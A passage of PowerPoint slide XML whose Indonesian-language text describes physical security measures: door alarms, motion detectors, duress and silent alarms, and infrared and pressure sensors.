              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketika</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> gateway </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dibiarkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terbuka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> lama </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>periode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ditentukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Detektor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>gerakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ruang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>biasanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Alarm </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>paksaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>staf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terpapar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di area </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>publik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Alarm </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bisa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>saja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbunyi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>peringatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terhubung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemantauan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Banyak alarm yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terhubung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>langsung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penegak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hukum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>setempat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perusahaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pihak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketiga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Alarm </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>senyap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memberi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tahu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>petugas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daripada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membunyikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> alarm yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>didengar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>Jenis Sensor</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Sensor sangat </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menerapkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>langkah-langkah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fisik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memberikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>deteksi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>proaktif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kemampuan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memperingatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terhadap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>potensi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pelanggaran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>teknologi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>termasuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>inframerah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tekanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>gelombang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mikro</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ultrasonik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, masing-masing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keunggulan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>unik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sesuai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>Sensor </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>inframerah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>biasanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>deteksi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>gerakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Sensor </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendeteksi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perubahan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pola</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>panas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>disebabkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>benda</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bergerak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyusup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>manusia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Sensor </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sering</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perumahan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komersial</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memicu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> alarm </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengaktifkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lampu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>saat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendeteksi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>gerakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>Sensor </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>tekanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>biasanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dipasang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lantai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> alas dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diaktifkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Sensor </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di area </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
